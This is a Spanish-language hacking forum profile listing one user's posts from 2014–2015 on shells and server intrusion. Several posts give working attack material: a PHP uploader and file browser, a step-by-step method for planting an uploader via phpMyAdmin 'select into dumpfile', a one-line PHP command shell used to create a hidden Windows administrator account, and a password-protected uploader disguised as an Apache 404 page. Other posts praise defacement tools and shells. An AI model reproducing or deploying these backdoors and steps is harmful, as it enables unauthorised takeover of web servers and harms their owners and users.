Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Decode

#1
Back-end / Re:[PHP] DH Defacer Tools 0.8
Septiembre 30, 2015, 07:27:36 PM
Buen trabajo.

Saludos.
#2
Si tu lo dices por el lado de ocultar ip por navegadores, usando un proxy o vpn sería factible pero no es seguro.

Saludos.
#3
Seguridad web y en servidores / Re:Backdooring con PHP.
Septiembre 14, 2015, 06:03:18 PM
El típico método, buen aporte.

Saludos.
#4
Shells / Re:[PHP] m31 shell [v0.1.2a]
Septiembre 14, 2015, 05:41:22 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Una consulta ya que estaba viendo esta shell.. hay un personaje llamado ''Veneno'' que ''remakeo'' una shell de q3rv0 y se parece mucho a esta no se si es coincidencia o cosa mía: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.

Pues decode yo pienso que este tío ha copiado el "remakeo" de Veneno, solamente cambio algunas cosas como el fondo y poco más, al menos que le de créditos a Veneno y a q3rv0.... después todos nos quejamos de Veneno.

Que estas diciendo Zanut? te invito a re-leer el tema junto con el nombre del AUTOR y la FECHA de publicación, no ganas nada defendiendo a veneno si ya todos saben la persona que es, el que esta quedando mal eres tu porque dices cosas incoherentes, como va aex12 a plagiarle el supuesto ''remakeo'' de la shell a veneno? si el ''remakeo'' de la shell de aex12 que hizo veneno fue en 2015 y el la ha publicado en 2013, porfavor fíjate en las fechas antes de comentar.

Saludos.
#5
Hacking / Uploader
Septiembre 10, 2015, 05:10:21 PM
Hola gente, aquí les traigo un uploader que muestra los archivos de la web + los directorios que compone:

Código: php
<html><head><title>Upload File</title>

<style>

body{background-color:#000; color:#FFF;}

a{color: #999; text-decoration:none;}

a:hover{text-decoration:underline;}

input,textarea,select{ color:#fff;background-color:#000;border:0;}

</style>
<?php

echo "

<script>

var d = document;

function g(c) {

d.mf.c.value=c;

d.mf.submit();

}

</script>

</head><body>";

echo PHP_OS;

if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN")

$os = 'win';

else

$os = 'nix';



$home_cwd = @getcwd();

if(isset($_POST['c']))

@chdir($_POST['c']);

$cwd = @getcwd();

if($os == 'win') {

$home_cwd = str_replace("\\", "/", $home_cwd);

$cwd = str_replace("\\", "/", $cwd);

echo "<!-- <td><nobr>Windows --!>";

echo "<!-- g('FilesMan','c:/') --!>";

}



$safe_mode = @ini_get('safe_mode');

if(!$safe_mode) {

echo "<!-- Safe mode:</span> <font color=#00bb00><b>OFF</b></font> --!>\n";

echo "<!-- Safe mode:</span> <font color=green><b>OFF</b></font> --!>\n";

}





if($cwd[strlen($cwd)-1] != '/')

$cwd .= '/';



echo "Path: ".htmlspecialchars($cwd)."<input type=hidden name=c value='".htmlspecialchars($cwd) ."'><hr>";

if (!is_writable($cwd)) {

echo "<font color=red>(Not writable)</font><br>";

}

if($_POST['p1'] === 'uploadFile') {

if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name']))

echo "Can't upload!<br />";

}



$ls = wscandir($cwd);

echo "<form method=post name=mf style='display:none;'><input type=hidden name=c></form>";

foreach ($ls as $f) {

if (is_dir($f)) {

echo "<a href=# onclick='g(\"".$cwd.$f."\");'>".$f."</a>";

if (is_writable($cwd.$f)) {

echo "<!-- 'filename.php','chmod')\"><font color=green> --!> ";

} else {

echo "<!-- 'filename.php','chmod')\"><font color=white> --!> ";

}

echo "<br />";

} else {

$files[] = $f;

}

}

foreach ($files as $file) {

echo $file."<br />";

}

echo "<hr><form method='post' ENCTYPE='multipart/form-data'>

<input type=hidden name=c value='" . $cwd ."'>

<input type=hidden name=p1 value='uploadFile'>

Upload File: <input type=file name=f><input type=submit value='>>'></form>";



function wscandir($cwdir) {

if(function_exists("scandir")) {

return scandir($cwdir);

} else {

$cwdh  = opendir($cwdir);

while (false !== ($filename = readdir($cwdh)))

$files[] = $filename;

return $files;

}

}

echo "</body></html>";


Saludos.
#6
Back-end / 404 Not Found
Septiembre 10, 2015, 04:13:38 PM
Hola gente, aquí les traigo un simple index 404 not found ya que la mayoría de la gente usa otros hosting que no tienen esta index como defecto de errores bueno aquí el código para que la puedan usar en sus websites:

Código: php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <?php echo $_SERVER['REQUEST_URI']; ?>  was not found on this server.</p>
<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>


Para poner esta index como defecto de errores en su web deben poner este código en el archivo de la web .htaccess:

Código: php
ErrorDocument 404 /nombredelarchivo.php


Saludos.
#7
Back-end / Re:[Tool] Is Online v3.0 (By 2Fac3R)
Septiembre 01, 2015, 09:13:21 PM
Excelente script, pero deberías mejorar algunas cosas como las font y los colores y también el nombre porque ''Is Online?'' = Es Online? debería ser: This Online? así se vería mejor ;)

Saludos.
#8
Perl / Sin asunto
Agosto 28, 2015, 07:39:31 PM
Delete
#9
Shells / Re:[PHP] m31 shell [v0.1.2a]
Agosto 18, 2015, 06:42:11 PM
Una consulta ya que estaba viendo esta shell.. hay un personaje llamado ''Veneno'' que ''remakeo'' una shell de q3rv0 y se parece mucho a esta no se si es coincidencia o cosa mía: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.
#10
Hola gente, aquí les traigo una herramienta que saca la verdadera ip aún estando navegando por un proxy o vpn:

Download: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.
#11
Shells / Eagle Shell
Agosto 02, 2015, 03:37:07 PM
Hola gente, aquí les presento Eagle Shell, basada en 1n73ction v3:





No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Password: eagle

Saludos.
#12
No has probado hacer un shell finder en php? sería muy bueno..

Saludos.
#13
Pentesting / Subir shell desde phpmyadmin (xampp)
Julio 09, 2015, 03:29:07 PM
Hola gente, aquí les vengo a enseñar como subir una shell desde phpmyadmin:

1- Lo primero que debemos hacer es tener acceso al phpmyadmin.
2- Luego crear una base de datos dentro del phpmyadmin con el nombre que quieran.
3- Luego de que la base de datos este creada nos vamos a SQL y empezamos a poner los siguientes códigos:

El primero es este:

Código: php
CREATE TABLE `NOMBRE DE LA DB`.`userform` (
`track1` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;


Luego de haber hecho esto debemos dar a continuar y poner un nuevo código, que es este:

Código: php
CREATE TABLE `NOMBRE DE LA DB`.`user_upload` (
`track2` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;


Luego de haber hecho este segundo paso insertamos el nuevo código con los mismos pasos anteriores, que es este:

Código: php
insert into userform values ('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Upload</title>
</head>
<body bgcolor="black">
<div style=" color:white;text-align:center; margin-top:60px; font-size:25px;
">Upload</div>
<div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
<form enctype="multipart/form-data" action="upload.php" method="post">
<input name="userfile" type="file" />&nbsp;
<input type="submit" value="Upload" />
</form>
</div>
</body>
</html>');


Luego de haber insertado el tercer código nos vamos a lo siguiente:

Código: php
select * into dumpfile 'C:/xampp/htdocs/form.php' from userform


Luego de haber hecho este paso insertaremos el siguiente código con los mismos pasos anteriores:

Código: php
INSERT INTO user_upload
VALUES (
"<?php $uploaddir = 'C:/xampp/htdocs/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if

(move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) { print '<body bgcolor=black></br></br><div

align=center><font size=5 color=white>File uploaded successfully</font></body>'; } else { print '<body

bgcolor=black></br></br><div align=center><font size=5 color=red>Error when uploading the file</font></body>'; } ?> "
)


Ya hecho este penúltimo paso nos vamos al último código que nos dará el privilegio de subir la shell al directorio principal del servidor:

Código: php
select * into dumpfile 'C:/xampp/htdocs/upload.php' from user_upload


Ya terminado todos estos pasos tendremos el privilegio de subir shell al directorio principal y tener acceso al servidor o host. Para dirigirnos al upload debemos ir a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y así podremos subir la shell.

Saludos.
#14
Bien explicado.

Saludos.
#15
Buen trabajo.

Saludos.
#16
Pentesting / Elevar privilegios en servidores windows
Noviembre 23, 2014, 06:46:36 PM
Hola gente, aquí les vengo a enseñar como elevar privilegios en servidores windows.

1- Bueno primero necesitan tener subida una shell a una web o host.
2- Después tener un archivo shell server windows subido en la web o host.

El código que insertaremos es este:

Código: php
<?php system($_GET['cmd']); ?>


Ya con el archivo subido van al link No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y les tiene que aparecer NT
AUTORITHY/SYSTEM si no les sale nada o les sale NT es porque no tiene servidor vps la web o host.

Ya realizado lo anterior ahora ponemos: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta user para ver los usuarios que tiene el servidor VPS.

Ya que hecho esto, ponemos: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta user (NOMBRE DEL USUARIO QUE VAN A CREAR) (CONTRASEÑA QUE VAN A PONERLE) /add esto es para crear el usuario, sin los paréntesis.

Bueno ya hecho esto nos aparecerá (THE COMMAND COMPLETED SUCCESSFULLY) y hacemos lo siguiente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta user para ver nuestro usuario añadido si no sale es que hicieron algo mal.

Ahora hacemos esto: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta localgroup Administrators (NOMBRE DEL USUARIO QUE HAN CREADO) /add y tiene que salir (THE COMMAND COMPLETED SUCCESSFULLY) esto es para darnos privilegios de Administrador en el servidor vps, sin los paréntesis.

Ahora para saber la IP del servidor VPS ponemos: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Ya hecho todos estos pasos, podremos acceder al servidor vps como un Administrador.

Saludos.
#17
Back-end / Sin asunto
Octubre 17, 2014, 10:52:47 PM
Delete
#18
Python / Sin asunto
Octubre 17, 2014, 10:40:12 PM
Delete
#19
Back-end / Uploader oculto
Agosto 26, 2014, 09:39:18 PM
Hola gente,aquí les dejo un uploader oculto:

Código: php
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at <?php echo $_SERVER['SERVER_NAME']; ?> Port 80</address>
    <style>
        input { margin:0;background-color:#fff;border:1px solid #fff; }
    </style>
    <center>
    <form method="post"><p>
<center><input type="password" name="pw" size="25" value=""></center>
</form></p></center>
<?php
if(empty($_POST["pw"])==0){if(md5($_POST["pw"])=="76ee3de97a1b8b903319b7c013d8c877"){if(empty($_FILES["A"])==0){
if(move_uploaded_file($_FILES['A']['tmp_name'],$_SERVER["DOCUMENT_ROOT"].'/'.$_FILES['A']['name'])==1){echo "<center>Archivo subido!</center>";}
}else{echo '<form enctype="multipart/form-data" action="'.$_SERVER["REQUEST_URI"].'" method="POST"><center><input name="A" type="file"><input type="submit" value="Subir"></center></form>';}exit();}}
?>


Password: upload

Saludos.
#20
Back-end / Sin asunto
Agosto 15, 2014, 09:57:18 PM
Delete